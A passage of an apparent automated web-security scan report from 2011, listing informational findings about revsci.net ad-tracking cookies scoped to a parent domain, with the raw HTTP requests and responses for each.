rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_p8aZ=MLsv7iUucA5nphC0/O7vtsjGNyz6AmULA1P4XndTcpIZ23d9qktkSoTcKGKIRpg710XdXThxtQ6zdFY6J95tmRiMY4yJ+sMdgAuenaLFrtrdRk1XWU9LpyjwtxgsQP0c7xxljHTX7BOLqY4xgQCs3lhGEqvHai05ED4MMDju8yVD7ZZtiMBMCGycqLqWcYC2y8NbVOx8Y1eQZ3yd0bUUw+UBsL8TnR7gPwiq0hl4MvT2YUt6oujwzI7qERgLlBVVr1Ckd5Szw9oGgYCZ3DWnFjsmwgyfZdo6malf61CzbVPZNP15BmGAfLkBkmJdnLDpC2OaS6bXfWondtA/5nZitsDt9iOXeX3L70GPHrFexa6SZ/0SCkkewx/BSDc2GjZn8H9slov9a6d6zjKI3U9d8/YecvDA6McTYIpxuqIYyG+L+BSmfQJVRVXrhI3ic9YEBCUo/esYIrRRnmxZiwg9IE39UhB58WPk2TkadyOOYhgupW0=; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDK8mbNy+QUBv0AIKNDUBSSiAqkracs3b0+sttkvcnG4FQF1YFME4zlfRD4gH9GEcK40FJyvVXvFWOSkvA0VXok/sQMTNpRvi17bSmHua6WA9WZtqLPeFcWOkre2FiGJnoSz9spn1x1tGgUNOfU7j20zgR7+ThGnVwVYDeaLVmTjOAUcAAbpL/2wV2KW0WEMJlthu2SC0hsPpVWCjWxzUAwOKnkQmJ+C1gUkcexW8OWRZuKqJA3BP4B2KFS4dIikJ0HMm+/Ai9VYl0K4SKpokfWj/I0spyfsCvw1vE4N5zpnPo

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_p8aZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpW80lkUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f17sIBz9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8id0bEE9wdz+aE+DTHEP/FwOA6hHcFAHeB6C25CRmkJMYHKSisXqcpUuocBcTo0su1h/6CHNtg5OtkGhlZcP2x6+09N/f+AEfH42qZHZs5sDNBh2nFUfaV2yJxAzXGps0rS6iDAne0d0f+fzWqEtjies8qbfGL8lOUhc29NFsk03JhxFGKv/9hI=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:50 GMT; Path=/
Set-Cookie: rtc_NU-e=MLsv8VUusQ9nplAbh+n6LFsXooeD0nh55ayhItw9Rx7JWLQrtG7pfYySB2GA3Nkt/3vE4EHvXHSrcNbcIO4b8B1jIlcCH5IHgInSD6DlrtrNRklXWU9LpinwxzgwQP187xxpkNoVxqc5g0Ksi0fqu3Z4OZ9TCWukp+fzOTqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lq/w84KnkvAlUkVNwOL7pOF2KVroDjGpx3LQL4w25Sc5a38gWgeVY5oBcsSi4lWRF8zflEvKnkkcWc7L2wiv9axAbc68YjzxC5/fI6qGaK7mrUiBp+5iAS38/Ln32j+SV/ehLBUSTYc5NoQpVx9D9jia6uekGvE+AnaQEGnf1161LH/ZBBrd1FkNrqH87szYKBCWcJz1+P0q9PArWGYEMwtIYB5HVWRY34FsNH9AzwMFIeiW+ySqObcbfFPPZWpQi/Pk976Tx24gqtUfcN9vTjpF5mgS/YLbhW; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:50 GMT; Path=/
X-Proc-ms: 28
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:50 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.106. http://pix04.revsci.net/E05511/b3/0/3/0902121/21225103.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/21225103.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/21225103.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_OT2-=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNV2xyc1W3wSgWiH53GskBj+0uPvbr8fL/03M+lmnwVEf4DsM5sw+zuqC6OKjBGhCiv0nZQy4ZVVoDwYqo6mnNRAo7OEEkJiv+bHNiyxW/clLxVJZkkeyyUV8ztAVi+A9zG0+EPcegfMGdz9/Dr32PiBkC/DCFzbz6JSYOyqhoYdpYn7eMNpSOdKL11qZrM6hDRzvlbWawXokjviVqpJEJmq4AbNHzRSYEvAqk8V1vS7MIKaCr4liagD/po7gg; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDK8mbN8dWU3gUYHSBgXF1Q2iK6QWdXO/91pNj2vFsFMbIW8UM7jRJXKFhp2TB0DM1qpPAHSY/5YU7ZStywpgUhqyJ5BInsNmgp1DvN3WPq7dgChZHMtDM/6x5OOiwoKfjgb0+ILnB0Su4g60wrJgUSjeLyFzDdvg9CRNBoPbOkdhQQ53dpWeEYa9TojOeowPB3LH+kNv0cpWE/pMJP094mgdkA6LvyBdQT0gKk8gxZkHUwdeGYigkpfkHSebdMR3LQqTjefT04q58F7jR7Q7rknDYEs9O1VaycX5p8CbtzlC92A==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_OT2-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpWU3hmUA+HR+nmRzzOL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+phz9GIcLk0FNfgXkx4D8v6War7+H+n9IY3rvMelQqlIvMHasq7diCRdHMsDP/Sq+8D4Q1wCE/3FsgyRke9cSEdLczcS8eR2CQRzAVoqeD6154KJDFZJWT8qJ5EKHnue0KBI0YmtgiHu4Ntq2Y0wgrFty41pfM0ejR+mO3cOXMhusMy2FrwjYCkBZRpiYbz20ntgVfPpIpnAOytuuxBL7P0KNrL/F6WV5eyzDyCaCp66M49iLenPs; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:59 GMT; Path=/
Set-Cookie: rtc_LJFw=MLsv8SUucA5nprADwxMUT9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPr9SkW1eU9LpSn2xzgwRP18/xx5kJplxqdZg0K0i0fqu/J/OZ9TCWtEp+fzuXuRG+FbCpZ1lOmeCoTp4pvl426xqmAFAWY4P51r/3fAwOzCWO5FcV4p1IrmF2CVroSvndkRCrxSEgB3YRuQwSAQiH132nljo3cuPvcqTkJH7pqq+HZ+yu4LbbP1Wws8UaQ//AvRqu0LQKkkR7aSBTL/fY/adAXHS4sVvNFsz2sFWsy5E+9lTHca29T2ckra1UWkj/ZVjlkwAfbv1rIjcWXvGBjkFTLYIeSAmiAAOsEhNg/HOoGcoZuIH37rGNoaFz8F4rx7j8fqSWaE+E5rI3yMJpNn0B20F8yoQz7E4kPhGO4G5iCUfwVoCLJLxkKPdlyOZqGapSs=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:59 GMT; Path=/
X-Proc-ms: 20
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:59 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.107. http://pix04.revsci.net/E05511/b3/0/3/0902121/281102501.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/281102501.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/281102501.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D398823%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; rtc_PzOz=MLsvr1UucS5jJxFcgo4AHK1+XkG5rAlP/Aq7SD8BxfGVHQohJ6FrqzzS13LtwLGPNU614wt1b+MA5RJdLaRrQUnmpA7Dn8HsEBQ22XijZ0avgB0uN3VFJc64A0JJWRHRyM1PJ99bh6wdpsfpwx4TBTmD3T+5LQCgxpcHmMgHZ8wIf5AXPQBlECGUWObVTp2Wl2qTjza4WAnSDu2o+g30biDqE3K7+WYa4uP79fIQxTnzUkcD2C2lBhcwN6MpTkcpeY7mSvqGCBrNPjyYsVMWxl5QK8tfyjKMF+FnU4w5VEBlKqw9THqvw7/hMLzC7Yn7urpFhINBgaNR6S81tE7rvXjW74KR31Dequ7esAsSMNxolukA9NP8blDzaV5mTOn/iSbi2cjC8JofbZ+Fcqks+HS7qUoBl5mk9dKKa7qhzXQ=; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBb3IMlZ8MYZlL6auMNYyIammiwEatDUBeSoA10YIeLKow9nlpJKVQ37I6YvuDT+H5/TzuIAPlAEdqo0FJzTVXvMkmPE4TwtBQ8OlZ90OHgdmWmGKDVcyIM1WCBrxt6ctuxa5T3ak16E9UMwEaTFGGCvQD+D51DLLEndcJCnpZVgB9CGZKrncjm5U4QXVDSQzPQkN8yYBk++EmhkF+QS6pQ6WDbGNezyszIInsZx52AtF0J56A7uajqKbIzuyoBX4tb2GWPb+2gInTsNzVGpgLc5BY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_PzOz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOFrwIQlrWdY9uoSEqZE8HQlp3QApINJwOPRQb1v4U4HgAfLAZUKGvcQE2W8ubQZ1PdqfSypuUx+zGRJapXG7SRnwOtt4XQFpRYqW2GMjvmS5/wVuCAf4vuLvqrY9q7tnjwFKu7X/+0XaEWf1bcq5+rD++cij37ozDT3SrHBInr52nwBgt2mllq1WDukUJxYg7+LP4yRXpZlK/KwBycfpTd0rGJZ11++gXBgj2MDfZntljCgdWeOVZDJUxmPFgwZCepKjf/yQt/91epw2ZIWGY3EKvwcA==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:08 GMT; Path=/
Set-Cookie: rtc_fD38=MLsv7lMucG5r51i93r4IM9TGU8HE2WihBMXGQkSn286NMFwCGETcqMzfbXziKmcrz0rlT3NXbQ2UQPY347g27oCUANSCq8NZjBisn3QA7dNcEnrj5CvIhcVabHvel3/DSTbq/1y+LSORX9Qb6uZ+/xxsqgjGObwCJtl4lmIRkmOq6dknFXic9AzqI7pWtaOhz0lDDVBT+EfLWQtWQim8GH5HVWELDEpJEbLUw6Jg04VvNANMm8nCbZHaeGWCCfCOJbWK/sAxQ5NGzpD8J6ji9kCmwOAU7AzRXpk9EHHa8hTwgWqMFwsDaB5Azfvk7Xq22OLEfgzLVUKiq8n5G0ivSFg4h3SF/AKFKQO20nm04/QvLfz3c+h6IQcDKx9dpliz4vdsDT1sbxJktw7XGFSOZbQ2gK+V9dLFQSs0EnPRWX/E30E=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:08 GMT; Path=/
Set-Cookie: NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c40&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:34:08 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:34:07 GMT
Content-Length: 413

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082','E05511_50085'
...[SNIP]...
5.108. http://pix04.revsci.net/E05511/b3/0/3/0902121/285224161.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/285224161.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/285224161.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D189321%2526affname%253DWCAX%2526adtag%253DSales%25252520-%25252520Travel%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=189321
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
